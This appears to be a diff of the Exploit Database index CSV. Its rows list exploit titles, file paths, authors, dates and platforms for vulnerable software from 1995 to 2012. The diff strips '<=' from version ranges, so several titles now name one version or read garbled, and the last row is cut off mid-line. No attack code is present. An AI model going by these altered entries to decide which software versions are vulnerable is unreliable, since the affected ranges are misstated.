19494,platforms/windows/remote/19494.c,"NetcPlus SmartServer 3.5.1 SMTP Buffer Overflow",1999-09-13,UNYUN,windows,remote,0 19495,platforms/windows/remote/19495.c,"Computalynx CMail 2.3 SP2/2.4 SMTP Buffer Overflow",1999-09-13,UNYUN,windows,remote,0 19496,platforms/windows/remote/19496.c,"FuseWare FuseMail 2.7 POP Mail Buffer Overflow",1999-09-13,UNYUN,windows,remote,0 -19497,platforms/multiple/local/19497.c,"DIGITAL UNIX 4.0 d/e/f_AIX <= 4.3.2_CDE <= 2.1_IRIX <= 6.5.14_Solaris <= 7.0 - Buffer Overflow",1999-09-13,"Job de Haas of ITSX",multiple,local,0 -19498,platforms/multiple/local/19498.sh,"Common Desktop Environment <= 2.1 20_Solaris <= 7.0 dtspcd",1999-09-13,"Job de Haas of ITSX",multiple,local,0 +19497,platforms/multiple/local/19497.c,"DIGITAL UNIX 4.0 d/e/f_AIX 4.3.2_CDE 2.1_IRIX 6.5.14_Solaris 7.0 - Buffer Overflow",1999-09-13,"Job de Haas of ITSX",multiple,local,0 +19498,platforms/multiple/local/19498.sh,"Common Desktop Environment 2.1 20_Solaris 7.0 dtspcd",1999-09-13,"Job de Haas of ITSX",multiple,local,0 19499,platforms/linux/local/19499.c,"SCO Open Server 5.0.5 X Library Buffer Overflow (1)",1999-09-09,"Brock Tellier",linux,local,0 19500,platforms/linux/local/19500.c,"SCO Open Server 5.0.5 X Library Buffer Overflow (2)",1999-06-21,"The Dark Raver of CPNE",linux,local,0 -19501,platforms/linux/local/19501.c,"DIGITAL UNIX 4.0 d/f_AIX <= 4.3.2_CDE <= 2.1_IRIX <= 6.5.14_Solaris <= 7.0_SunOS <= 4.1.4 BoF",1999-09-13,"Job de Haas of ITSX",linux,local,0 +19501,platforms/linux/local/19501.c,"DIGITAL UNIX 4.0 d/f_AIX 4.3.2_CDE 2.1_IRIX 6.5.14_Solaris 7.0_SunOS 4.1.4 BoF",1999-09-13,"Job de Haas of ITSX",linux,local,0 19502,platforms/windows/local/19502.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5 - RASMAN Privilege Escalation",1999-09-17,"Alberto Rodríguez Aragonés",windows,local,0 19503,platforms/linux/remote/19503.txt,"ProFTPD 1.2 pre6 - snprintf",1999-09-17,"Tymm Twillman",linux,remote,0 19504,platforms/freebsd/local/19504.c,"Martin Schulze Cfingerd 1.4.2 GECOS Buffer Overflow",1999-09-21,"babcia padlina ltd",freebsd,local,0 19505,platforms/freebsd/dos/19505.c,"FreeBSD 3.0/3.1/3.2 vfs_cache - Denial of Service",1999-09-22,"Charles M. Hannum",freebsd,dos,0 19506,platforms/windows/local/19506.txt,"MDAC 2.1.2.4202.3_ms Win NT 4.0/SP1-6 JET/ODBC Patch and RDS Fix Registry Key Vulnerabilities",1999-09-21,.rain.forest.puppy,windows,local,0 -19507,platforms/solaris/remote/19507.txt,"Solaris <= 7.0 Recursive mutex_enter Panic",1999-09-23,"David Brumley",solaris,remote,0 +19507,platforms/solaris/remote/19507.txt,"Solaris 7.0 Recursive mutex_enter Panic",1999-09-23,"David Brumley",solaris,remote,0 19508,platforms/linux/local/19508.sh,"S.u.S.E. Linux 6.2 sscw HOME Environment Variable Buffer Overflow",1999-09-23,"Brock Tellier",linux,local,0 -19509,platforms/solaris/local/19509.sh,"Solaris <= 2.6 Profiling File Creation",1999-09-22,"Steve Mynott",solaris,local,0 +19509,platforms/solaris/local/19509.sh,"Solaris 2.6 Profiling File Creation",1999-09-22,"Steve Mynott",solaris,local,0 19510,platforms/linux/local/19510.pl,"SSH Communications Security SSH 1.2.27 - Authentication Socket File Creation",1999-09-17,"Tymm Twillman",linux,local,0 19511,platforms/linux/local/19511.c,"Knox Software Arkeia 4.0 Backup Local Overflow",1999-09-26,"Brock Tellier",linux,local,0 19512,platforms/linux/local/19512.sh,"Mandriva Linux Mandrake 6.0_Gnome Libs 1.0.8 espeaker - Local Buffer Overflow",1999-09-26,"Brock Tellier",linux,local,0 @@ -16896,31 +16896,31 @@ id,file,description,date,author,platform,type,port 19528,platforms/windows/local/19528.txt,"Microsoft Internet Explorer 4.1/5.0 Registration Wizard Buffer Overflow",1999-09-27,"Shane Hird",windows,local,0 19529,platforms/solaris/local/19529.c,"Solaris 7.0 /usr/bin/mail -m - Local Buffer Overflow",1999-09-12,"Brock Tellier",solaris,local,0 19530,platforms/windows/remote/19530.txt,"Microsoft Internet Explorer 5.0 Download Behavior",1999-09-27,"Georgi Guninski",windows,remote,0 -19531,platforms/hardware/remote/19531.txt,"Cisco IOS <= 12.0.2 Syslog Crash",1999-01-11,"Olaf Selke",hardware,remote,0 -19532,platforms/aix/remote/19532.pl,"IBM AIX <= 4.3.2 ftpd Remote Buffer Overflow",1999-09-28,Gerrie,aix,remote,0 -19533,platforms/solaris/local/19533.c,"Solaris <= 7.0 ufsdump Local Buffer Overflow (1)",1998-04-23,smm,solaris,local,0 -19534,platforms/solaris/local/19534.c,"Solaris <= 7.0 ufsdump Local Buffer Overflow (2)",1998-12-30,"Cheez Whiz",solaris,local,0 -19535,platforms/hp-ux/local/19535.pl,"HP-UX <= 10.20 newgrp",1996-12-01,SOD,hp-ux,local,0 -19536,platforms/multiple/dos/19536.txt,"Apache <= 1.1 / NCSA httpd <= 1.5.2 / Netscape Server 1.12/1.1/2.0 - a nph-test-cgi",1996-12-10,"Josh Richards",multiple,dos,0 +19531,platforms/hardware/remote/19531.txt,"Cisco IOS 12.0.2 Syslog Crash",1999-01-11,"Olaf Selke",hardware,remote,0 +19532,platforms/aix/remote/19532.pl,"IBM AIX 4.3.2 ftpd Remote Buffer Overflow",1999-09-28,Gerrie,aix,remote,0 +19533,platforms/solaris/local/19533.c,"Solaris 7.0 ufsdump Local Buffer Overflow (1)",1998-04-23,smm,solaris,local,0 +19534,platforms/solaris/local/19534.c,"Solaris 7.0 ufsdump Local Buffer Overflow (2)",1998-12-30,"Cheez Whiz",solaris,local,0 +19535,platforms/hp-ux/local/19535.pl,"HP-UX 10.20 newgrp",1996-12-01,SOD,hp-ux,local,0 +19536,platforms/multiple/dos/19536.txt,"Apache 1.1 / NCSA httpd 1.5.2 / Netscape Server 1.12/1.1/2.0 - a nph-test-cgi",1996-12-10,"Josh Richards",multiple,dos,0 19537,platforms/windows/remote/19537.txt,"teamshare teamtrack 3.0 - Directory Traversal",1999-10-02,"rain forest puppy",windows,remote,0 19538,platforms/hardware/remote/19538.txt,"Hybrid Networks Cable Broadband Access System 1.0 - Remote Configuration",1999-10-05,KSR[T],hardware,remote,0 19539,platforms/windows/remote/19539.txt,"Microsoft Internet Explorer 5.0/4.0.1 IFRAME",1999-10-11,"Georgi Guninski",windows,remote,0 19540,platforms/windows/remote/19540.txt,"t. hauck jana webserver 1.0/1.45/1.46 - Directory Traversal",1999-10-08,"Jason Lutz",windows,remote,0 19541,platforms/novell/dos/19541.txt,"Novell Client 3.0/3.0.1 - Denial of Service",1999-10-08,"Bruce Dennison",novell,dos,0 -19542,platforms/sco/local/19542.txt,"SCO Open Server <= 5.0.5 - 'userOsa' symlink",1999-10-11,"Brock Tellier",sco,local,0 +19542,platforms/sco/local/19542.txt,"SCO Open Server 5.0.5 - 'userOsa' symlink",1999-10-11,"Brock Tellier",sco,local,0 19543,platforms/sco/local/19543.c,"SCO Open Server 5.0.5 cancel Buffer Overflow",1999-10-08,"Brock Tellier",sco,local,0 -19544,platforms/linux/local/19544.c,"BSD/OS 2.1_FreeBSD <= 2.1.5_NeXTstep 4.x_IRIX <= 6.4_SunOS 4.1.3/4.1.4 lpr Buffer Overrun(1)",1996-10-25,"Vadim Kolontsov",linux,local,0 -19545,platforms/bsd/local/19545.c,"BSD/OS 2.1_FreeBSD <= 2.1.5_NeXTstep 4.x_IRIX <= 6.4_SunOS 4.1.3/4.1.4 lpr Buffer Overrun(2)",1996-10-25,"Vadim Kolontsov",bsd,local,0 +19544,platforms/linux/local/19544.c,"BSD/OS 2.1_FreeBSD 2.1.5_NeXTstep 4.x_IRIX 6.4_SunOS 4.1.3/4.1.4 lpr Buffer Overrun(1)",1996-10-25,"Vadim Kolontsov",linux,local,0 +19545,platforms/bsd/local/19545.c,"BSD/OS 2.1_FreeBSD 2.1.5_NeXTstep 4.x_IRIX 6.4_SunOS 4.1.3/4.1.4 lpr Buffer Overrun(2)",1996-10-25,"Vadim Kolontsov",bsd,local,0 19546,platforms/multiple/local/19546.pl,"BSD/OS 2.1/3.0_Larry Wall Perl 5.0 03_RedHat 4.0/4.1_SGI Freeware 1.0/2.0 suidperl Overflow (1)",1997-04-17,"Pavel Kankovsky",multiple,local,0 19547,platforms/multiple/local/19547.txt,"BSD/OS 2.1/3.0_Larry Wall Perl 5.0 03_RedHat 4.0/4.1_SGI Freeware 1.0/2.0 suidperl Overflow (2)",1997-04-17,"Willy Tarreau",multiple,local,0 19548,platforms/php/webapps/19548.txt,"gp easy CMS Minishop 1.5 Plugin Persistent XSS",2012-07-03,"Carlos Mario Penagos Hollmann",php,webapps,0 19549,platforms/php/webapps/19549.txt,"CLscript Classified Script 3.0 - SQL Injection",2012-07-03,"Daniel Godoy",php,webapps,0 -19550,platforms/php/webapps/19550.txt,"phpMyBackupPro <= 2.2 - Local File Inclusion",2012-07-03,dun,php,webapps,0 -19551,platforms/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS (1)",1997-02-13,"Last Stage of Delirium",multiple,local,0 -19552,platforms/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS (2)",1997-02-13,"Solar Designer",multiple,local,0 +19550,platforms/php/webapps/19550.txt,"phpMyBackupPro 2.2 - Local File Inclusion",2012-07-03,dun,php,webapps,0 +19551,platforms/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5_AIX 4.2_libc 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS (1)",1997-02-13,"Last Stage of Delirium",multiple,local,0 +19552,platforms/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5_AIX 4.2_libc 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS (2)",1997-02-13,"Solar Designer",multiple,local,0 19553,platforms/php/remote/19553.txt,"PHP/FI 1.0/FI 2.0/FI 2.0 b10 mylog/mlog",1997-10-19,"Bryan Berg",php,remote,0 -19554,platforms/hardware/remote/19554.c,"Lucent Ascend MAX <= 5.0/Pipeline <= 6.0/TNT 1.0/2.0 Router MAX UDP Port 9 - (1)",1998-03-16,Rootshell,hardware,remote,0 -19555,platforms/hardware/remote/19555.pl,"Lucent Ascend MAX <= 5.0/Pipeline <= 6.0/TNT 1.0/2.0 Router MAX UDP Port 9 - (2)",1998-03-17,Rootshell,hardware,remote,0 +19554,platforms/hardware/remote/19554.c,"Lucent Ascend MAX 5.0/Pipeline 6.0/TNT 1.0/2.0 Router MAX UDP Port 9 - (1)",1998-03-16,Rootshell,hardware,remote,0 +19555,platforms/hardware/remote/19555.pl,"Lucent Ascend MAX 5.0/Pipeline 6.0/TNT 1.0/2.0 Router MAX UDP Port 9 - (2)",1998-03-17,Rootshell,hardware,remote,0 19556,platforms/multiple/local/19556.sh,"BSD 2_CND 1_Sendmail 8.x_FreeBSD 2.1.x_HP-UX 10.x_AIX 4_RedHat 4 - Sendmail Daemon",1996-11-16,"Leshka Zakharoff",multiple,local,0 19557,platforms/linux/remote/19557.txt,"John S.2 Roberts AnyForm 1.0/2.0 CGI Semicolon",1995-07-31,"Paul Phillips",linux,remote,0 19558,platforms/linux/remote/19558.c,"OpenLink Software OpenLink 3.2 - Remote Buffer Overflow",1999-10-15,"Tymm Twillman",linux,remote,0 @@ -16938,7 +16938,7 @@ id,file,description,date,author,platform,type,port 19570,platforms/windows/remote/19570.txt,"WFTPD 2.34/2.40/3.0 - Remote Buffer Overflow (2)",1999-11-04,"Alberto Solino",windows,remote,0 19571,platforms/multiple/dos/19571.c,"Netscape Messaging Server 3.6/3.54/3.55 RCPT TO DoS",1999-10-28,"Nobuo Miwa",multiple,dos,0 19572,platforms/php/webapps/19572.txt,"WordPress MoodThingy Widget 0.8.7 - Blind SQL Injection",2012-07-04,"Chris Kellum",php,webapps,0 -19573,platforms/php/webapps/19573.php,"Tiki Wiki CMS Groupware <= 8.3 - 'unserialize()' PHP Code Execution",2012-07-04,EgiX,php,webapps,0 +19573,platforms/php/webapps/19573.php,"Tiki Wiki CMS Groupware 8.3 - 'unserialize()' PHP Code Execution",2012-07-04,EgiX,php,webapps,0 19574,platforms/php/webapps/19574.txt,"Webify Link Directory SQL Injection",2012-07-04,"Daniel Godoy",php,webapps,0 19575,platforms/windows/dos/19575.txt,".NET Framework - Tilde Character DoS",2012-07-04,"Soroush Dalili",windows,dos,0 19576,platforms/windows/remote/19576.rb,"IBM Rational ClearQuest CQOle Remote Code Execution",2012-07-05,Metasploit,windows,remote,0 @@ -16951,7 +16951,7 @@ id,file,description,date,author,platform,type,port 19677,platforms/linux/local/19677.c,"FreeBSD 3.3_Linux Mandrake 7.0 - 'xsoldier' Buffer Overflow (2)",2000-05-17,"Larry W. Cashdollar",linux,local,0 19580,platforms/windows/remote/19580.txt,"Avirt Gateway Suite 3.3 a/3.5 Mail Server Buffer Overflow (1)",1999-10-31,"Luck Martins",windows,remote,0 19581,platforms/windows/remote/19581.txt,"Avirt Gateway Suite 3.3 a/3.5 Mail Server Buffer Overflow (2)",1999-10-31,"dark spyrit",windows,remote,0 -19582,platforms/unix/local/19582.c,"IRIX <= 6.5_Solaris <= 7.0_Turbolinux 4.2 - 'uum' Buffer Overflow",1999-11-02,UNYUN,unix,local,0 +19582,platforms/unix/local/19582.c,"IRIX 6.5_Solaris 7.0_Turbolinux 4.2 - 'uum' Buffer Overflow",1999-11-02,UNYUN,unix,local,0 19583,platforms/unix/local/19583.c,"Turbolinux 3.5 b2 - 'canuum' Buffer Overflow",1999-11-02,UNYUN,unix,local,0 19584,platforms/windows/remote/19584.c,"Sky Communications Skyfull 1.1.4 Mail Server MAIL FROM Buffer Overflow",1999-10-30,UNYUN,windows,remote,0 19585,platforms/windows/local/19585.c,"Yamaha MidiPlug 1.1 b-j MidiPlug Buffer Overflow",1999-11-02,UNYUN,windows,local,0 @@ -16972,8 +16972,8 @@ id,file,description,date,author,platform,type,port 19603,platforms/windows/remote/19603.txt,"Microsoft Internet Explorer 4.x/5.0_Outlook 2000 0/98 0/Express 4.x - ActiveX CAB File Execution",1999-11-08,Mukund,windows,remote,0 20122,platforms/windows/remote/20122.rb,"Microsoft Office SharePoint Server 2007 - Remote Code Execution",2012-07-31,Metasploit,windows,remote,8082 30094,platforms/php/webapps/30094.txt,"DGNews 2.1 Footer.php Cross-Site Scripting",2007-05-28,"Jesper Jurcenoks",php,webapps,0 -20120,platforms/windows/remote/20120.pl,"httpdx <= 1.5.4 - Remote Heap Overflow",2012-07-29,st3n,windows,remote,0 -19605,platforms/linux/dos/19605.c,"Linux Kernel <= 3.2.24 - fs/eventpoll.c Local Denial of Service",2012-07-05,"Yurij M. Plotnikov",linux,dos,0 +20120,platforms/windows/remote/20120.pl,"httpdx 1.5.4 - Remote Heap Overflow",2012-07-29,st3n,windows,remote,0 +19605,platforms/linux/dos/19605.c,"Linux Kernel 3.2.24 - fs/eventpoll.c Local Denial of Service",2012-07-05,"Yurij M. Plotnikov",linux,dos,0 19903,platforms/multiple/remote/19903.txt,"Gossamer Threads DBMan 2.0.4 DBMan Information Leakage",2000-05-05,"Black Watch Labs",multiple,remote,0 19607,platforms/windows/remote/19607.c,"Windows 95/98 UNC Buffer Overflow (1)",1999-11-09,UNYUN,windows,remote,0 19608,platforms/windows/remote/19608.c,"Windows 95/98 UNC Buffer Overflow (2)",1999-11-09,UNYUN,windows,remote,0 @@ -16983,7 +16983,7 @@ id,file,description,date,author,platform,type,port 19612,platforms/windows/remote/19612.pl,"Trend Micro InterScan VirusWall 3.2.3/3.3 Long HELO Buffer Overflow (1)",1999-11-07,"Alain Thivillon & Stephane Aubert",windows,remote,0 19613,platforms/windows/remote/19613.rb,"Poison Ivy 2.3.2 C&C Server Buffer Overflow",2012-07-06,Metasploit,windows,remote,3460 19614,platforms/windows/remote/19614.asm,"Trend Micro InterScan VirusWall 3.2.3/3.3 Long HELO Buffer Overflow (2)",1999-11-07,"dark spyrit",windows,remote,0 -19615,platforms/unix/dos/19615.c,"ISC BIND <= 8.2.2 / IRIX <= 6.5.17 / Solaris 7.0 - (NXT Overflow and Denial of Service) Vulnerabilities",1999-11-10,"ADM Crew",unix,dos,0 +19615,platforms/unix/dos/19615.c,"ISC BIND 8.2.2 / IRIX 6.5.17 / Solaris 7.0 - (NXT Overflow and Denial of Service) Vulnerabilities",1999-11-10,"ADM Crew",unix,dos,0 19616,platforms/windows/dos/19616.c,"Ipswitch IMail 5.0.5/5.0.6/5.0.7 - POP3 Denial of Service (Possible Buffer Overflow)",1999-11-08,Interrupt,windows,dos,0 19617,platforms/windows/remote/19617.txt,"NetcPlus SmartServer3 3.5.1 POP Buffer Overflow",1999-11-11,"Ussr Labs",windows,remote,0 19618,platforms/windows/remote/19618.txt,"Microsoft Internet Explorer 5.0 Media Player ActiveX Error Message",1999-11-14,"Georgi Guninski",windows,remote,0 @@ -16997,7 +16997,7 @@ id,file,description,date,author,platform,type,port 19626,platforms/php/webapps/19626.txt,"sflog! <= 1.00 - Multiple Vulnerabilities",2012-07-06,dun,php,webapps,0 19628,platforms/php/webapps/19628.txt,"Event Script PHP 1.1 CMS - Multiple Vulnerabilities",2012-07-06,Vulnerability-Lab,php,webapps,0 19629,platforms/php/webapps/19629.txt,"Webmatic 3.1.1 - Blind SQL Injection",2012-07-06,"High-Tech Bridge SA",php,webapps,0 -19630,platforms/php/webapps/19630.rb,"Tiki Wiki <= 8.3 - unserialize() PHP Code Execution",2012-07-09,Metasploit,php,webapps,0 +19630,platforms/php/webapps/19630.rb,"Tiki Wiki 8.3 - unserialize() PHP Code Execution",2012-07-09,Metasploit,php,webapps,0 19631,platforms/php/webapps/19631.rb,"Basilic 1.5.14 diff.php Arbitrary Command Execution",2012-07-09,Metasploit,php,webapps,0 19632,platforms/hardware/remote/19632.txt,"Tektronix Phaser Network Printer 740/750/750DP/840/930 PhaserLink Webserver",1999-11-17,"Dennis W. Mattison",hardware,remote,0 19633,platforms/windows/local/19633.txt,"Windows 95/98/Enterprise Server 4/NT Server 4/Terminal Server 4/Workstation 4 Riched Buffer Overflow",1999-11-17,"Pauli Ojanpera",windows,local,0 @@ -17070,7 +17070,7 @@ id,file,description,date,author,platform,type,port 19705,platforms/unixware/remote/19705.c,"Netscape FastTrack Server 2.0.1a - GET Buffer Overflow",1999-12-31,"Brock Tellier",unixware,remote,0 19706,platforms/irix/local/19706.sh,"SGI IRIX 6.2 midikeys/soundplayer",1999-12-31,Loneguard,irix,local,0 19707,platforms/unix/local/19707.sh,"Ascend CascadeView/UX 1.0 tftpd - Symbolic Link",1999-12-31,Loneguard,unix,local,0 -19708,platforms/php/remote/19708.php,"PHP <= 3.0.13 - 'safe_mode' Failure",2000-01-04,"Kristian Koehntopp",php,remote,0 +19708,platforms/php/remote/19708.php,"PHP 3.0.13 - 'safe_mode' Failure",2000-01-04,"Kristian Koehntopp",php,remote,0 19709,platforms/linux/local/19709.sh,"Mandrake 6.x / RedHat 6.x / Turbolinux 3.5 b2/4.x/6.0.2 userhelper/PAM - Path (1)",2000-01-04,dildog,linux,local,0 19710,platforms/linux/local/19710.c,"Mandrake 6.x / RedHat 6.x / Turbolinux 3.5 b2/4.x/6.0.2 userhelper/PAM - Path (2)",2000-03-15,"Elias Levy",linux,local,0 19711,platforms/windows/dos/19711.txt,"Ipswitch IMail 5.0.8/6.0/6.1 IMonitor status.cgi DoS",2000-01-05,"Ussr Labs",windows,dos,0 @@ -17084,11 +17084,11 @@ id,file,description,date,author,platform,type,port 19719,platforms/windows/remote/19719.txt,"Microsoft Internet Explorer 4.0/4.0.1/5.0/5.0.1/5.5 preview Security Zone Settings Lag",2000-01-07,"Georgi Guninski",windows,remote,0 19720,platforms/windows/dos/19720.c,"NullSoft Winamp 2.10 - Playlist",2000-01-10,"Steve Fewer",windows,dos,0 19721,platforms/multiple/local/19721.txt,"MySQL 3.22.27/3.22.29/3.23.8 GRANT Global Password Changing",2000-02-15,"Viktor Fougstedt",multiple,local,0 -19722,platforms/unix/remote/19722.txt,"RedHat <= 6.1_IRIX <= 6.5.18 lpd Vulnerabilities",2000-01-11,anonymous,unix,remote,0 +19722,platforms/unix/remote/19722.txt,"RedHat 6.1_IRIX 6.5.18 lpd Vulnerabilities",2000-01-11,anonymous,unix,remote,0 19723,platforms/linux/local/19723.txt,"Corel Linux OS 1.0 get_it PATH",2000-01-12,"Cesar Tascon Alvarez",linux,local,0 19724,platforms/windows/remote/19724.txt,"Mirabilis ICQ 0.99 b 1.1.1.1/3.19 - Remote Buffer Overflow",2000-01-12,"Drew Copley",windows,remote,0 19725,platforms/windows/dos/19725.txt,"Nosque Workshop MsgCore 1.9 - Denial of Service",2000-01-13,"Ussr Labs",windows,dos,0 -19726,platforms/bsd/local/19726.c,"FreeBSD <= 3.4_NetBSD <= 1.4.1_OpenBSD <= 2.6 - /proc File Sytem",2000-01-21,Nergal,bsd,local,0 +19726,platforms/bsd/local/19726.c,"FreeBSD 3.4_NetBSD 1.4.1_OpenBSD 2.6 - /proc File Sytem",2000-01-21,Nergal,bsd,local,0 19727,platforms/linux/local/19727.c,"Inter7 vpopmail (vchkpw) <= 3.4.11 - Buffer Overflow",2000-01-21,K2,linux,local,0 19728,platforms/windows/local/19728.txt,"Microsoft Systems Management Server 2.0 Default Permissions",1999-12-29,"Frank Monroe",windows,local,0 19729,platforms/linux/remote/19729.c,"Qualcomm qpopper 3.0 - 'LIST' Buffer Overflow",2000-01-10,Zhodiac,linux,remote,0 @@ -17149,7 +17149,7 @@ id,file,description,date,author,platform,type,port 19787,platforms/linux/local/19787.txt,"Corel Linux OS 1.0 - DoSemu Distribution Configuration",2000-03-02,suid,linux,local,0 19788,platforms/irix/remote/19788.pl,"SGI InfoSearch 1.0_SGI IRIX 6.5.x fname",2000-03-05,rpc,irix,remote,0 19789,platforms/windows/local/19789.txt,"Microsoft Clip Art Gallery 5.0 - Buffer Overflow",2000-03-06,dildog,windows,local,0 -19790,platforms/php/webapps/19790.txt,"webpagetest <= 2.6 - Multiple Vulnerabilities",2012-07-13,dun,php,webapps,0 +19790,platforms/php/webapps/19790.txt,"webpagetest 2.6 - Multiple Vulnerabilities",2012-07-13,dun,php,webapps,0 19791,platforms/php/webapps/19791.txt,"WordPress Resume Submissions & Job Postings 2.5.1 - Unrestricted File Upload",2012-07-13,"Chris Kellum",php,webapps,0 19792,platforms/php/webapps/19792.txt,"Joomla KISS Advertiser Remote File & Bypass Upload",2012-07-13,D4NB4R,php,webapps,0 19830,platforms/windows/remote/19830.txt,"Microsoft Index Server 2.0 - '%20' ASP Source Disclosure",2000-03-31,"David Litchfield",windows,remote,0 @@ -17225,7 +17225,7 @@ id,file,description,date,author,platform,type,port 19863,platforms/php/webapps/19863.txt,"CakePHP 2.x-2.2.0-RC2 XXE Injection",2012-07-16,"Pawel Wylecial",php,webapps,0 19864,platforms/php/webapps/19864.txt,"VamCart 0.9 CMS - Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,php,webapps,0 19865,platforms/php/webapps/19865.txt,"PBBoard 2.1.4 CMS - Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,php,webapps,0 -19866,platforms/windows/dos/19866.pl,"DomsHttpd <= 1.0 - Remote Denial of Service Exploit",2012-07-16,"Jean Pascal Pereira",windows,dos,0 +19866,platforms/windows/dos/19866.pl,"DomsHttpd 1.0 - Remote Denial of Service Exploit",2012-07-16,"Jean Pascal Pereira",windows,dos,0 19867,platforms/linux/local/19867.txt,"S.u.S.E. Linux 6.x - Arbitrary File Deletion",2000-04-21,Peter_M,linux,local,0 19868,platforms/linux/remote/19868.c,"LCDProc 0.4 - Buffer Overflow",2000-04-23,"Andrew Hobgood",linux,remote,0 19869,platforms/linux/dos/19869.txt,"Qualcomm qpopper 2.53/3.0_ RedHat imap 4.5 -4_ UoW imap 4.5 popd - Lock File DoS",2000-04-19,"Alex Mottram",linux,dos,0 @@ -17256,7 +17256,7 @@ id,file,description,date,author,platform,type,port 19895,platforms/windows/remote/19895.txt,"NetWin DNews 5.3 Server Buffer Overflow",2000-03-01,Joey__,windows,remote,0 19896,platforms/bsd/dos/19896.c,"FreeBSD 3.4/4.0/5.0 / NetBSD 1.4 - Unaligned IP Option Denial of Service",2000-05-04,y3t1,bsd,dos,0 19897,platforms/windows/remote/19897.txt,"FrontPage 2000_IIS 4.0/5.0 Server Extensions Path Disclosure",2000-05-06,"Frankie Zie",windows,remote,0 -19898,platforms/php/webapps/19898.txt,"Forum Oxalis <= 0.1.2 - SQL Injection",2012-07-17,"Jean Pascal Pereira",php,webapps,0 +19898,platforms/php/webapps/19898.txt,"Forum Oxalis 0.1.2 - SQL Injection",2012-07-17,"Jean Pascal Pereira",php,webapps,0 19899,platforms/cgi/dos/19899.txt,"UltraBoard 1.6 DoS",2000-05-05,"Juan M. Bello Rivas",cgi,dos,0 19900,platforms/linux/local/19900.c,"RedHat Linux 6.0/6.1/6.2 pam_console",2000-05-03,"Michal Zalewski",linux,local,0 19901,platforms/hardware/remote/19901.txt,"Netopia R-series routers 4.6.2",2000-05-16,"Stephen Friedl",hardware,remote,0 @@ -17335,7 +17335,7 @@ id,file,description,date,author,platform,type,port 19984,platforms/multiple/dos/19984.c,"Eterm 0.8.10_rxvt 2.6.1_PuTTY 0.48_X11R6 3.3.3/4.0 - Denial of Service",2000-05-31,"Kit Knox",multiple,dos,0 19985,platforms/php/webapps/19985.txt,"NetArt Media iBoutique 4.0 - (index.php key parameter) SQL Injection",2012-07-20,"SecPod Research",php,webapps,0 19986,platforms/windows/dos/19986.txt,"Oxide Webserver 2.0.4 - Denial of Service",2012-07-20,"SecPod Research",windows,dos,0 -19987,platforms/linux/dos/19987.py,"ptunnel <= 0.72 - Remote Denial of Service",2012-07-20,st3n,linux,dos,0 +19987,platforms/linux/dos/19987.py,"ptunnel 0.72 - Remote Denial of Service",2012-07-20,st3n,linux,dos,0 19988,platforms/windows/dos/19988.pl,"httpdx 1.5.4 - Remote HTTP Server Denial of Service",2012-07-20,st3n,windows,dos,0 19989,platforms/windows/local/19989.c,"PassWD 1.2 Weak Encryption",2000-06-04,"Daniel Roethlisberger",windows,local,0 19990,platforms/hp-ux/local/19990.txt,"HP-UX 10.20/11.0 man /tmp symlink",2000-06-02,"Jason Axley",hp-ux,local,0 @@ -17348,8 +17348,8 @@ id,file,description,date,author,platform,type,port 19997,platforms/windows/remote/19997.java,"Etype Eserv 2.9.2 Logging Buffer Overflow",2000-05-10,Wizdumb,windows,remote,0 19998,platforms/linux/remote/19998.c,"ISC innd 2.x - Remote Buffer Overflow",2000-06-12,"Michal Zalewski",linux,remote,0 19999,platforms/multiple/local/19999.txt,"BRU 15.1/16.0 BRUEXECLOG Environment Variable",2000-06-05,"Riley Hassell",multiple,local,0 -20000,platforms/linux/local/20000.c,"Linux Kernel 2.2.x <= 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Local Root 'sendmail' (1)",2000-06-07,"Florian Heinz",linux,local,0 -20001,platforms/linux/local/20001.sh,"Linux Kernel 2.2.x <= 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Local Root (sendmail <= 8.10.1) (2)",2000-06-07,"Wojciech Purczynski",linux,local,0 +20000,platforms/linux/local/20000.c,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Local Root 'sendmail' (1)",2000-06-07,"Florian Heinz",linux,local,0 +20001,platforms/linux/local/20001.sh,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Local Root (sendmail 8.10.1) (2)",2000-06-07,"Wojciech Purczynski",linux,local,0 20002,platforms/hp-ux/local/20002.txt,"HP-UX 10.20/11.0 SNMPD File Permission Vulnerabilities",2000-06-07,loveyou,hp-ux,local,0 20003,platforms/solaris/local/20003.txt,"Intel Corporation Shiva Access Manager 5.0 Solaris World Readable LDAP Password",2000-06-06,"Blaise St. Laurent",solaris,local,0 20004,platforms/linux/local/20004.c,"Stelian Pop dump 0.4 restore Buffer Overflow",2000-06-07,"Stan Bubrouski",linux,local,0 @@ -17431,7 +17431,7 @@ id,file,description,date,author,platform,type,port 20083,platforms/php/webapps/20083.txt,"WordPress Front End Upload 0.5.4.4 - Arbitrary PHP File Upload",2012-07-24,"Chris Kellum",php,webapps,0 20085,platforms/cgi/remote/20085.txt,"Computer Software Manufaktur Alibaba 2.0 Piped Command",2000-07-18,Prizm,cgi,remote,0 20086,platforms/windows/remote/20086.c,"OReilly Software WebSite Professional 2.3.18/2.4/2.4.9 - 'webfind.exe' Buffer Overflow",2000-06-01,"Robert Horton",windows,remote,0 -20087,platforms/php/webapps/20087.py,"Zabbix <= 2.0.1 - Session Extractor (0Day)",2012-07-24,muts,php,webapps,0 +20087,platforms/php/webapps/20087.py,"Zabbix 2.0.1 - Session Extractor (0Day)",2012-07-24,muts,php,webapps,0 20088,platforms/linux/remote/20088.py,"Symantec Web Gateway 5.0.3.18 - pbcontrol.php ROOT RCE Exploit",2012-07-24,muts,linux,remote,0 20089,platforms/windows/remote/20089.txt,"Microsoft IIS 4.0/5.0 Source Fragment Disclosure",2000-07-17,"Zuo Lei",windows,remote,0 20090,platforms/hardware/dos/20090.txt,"HP JetDirect J3111A - 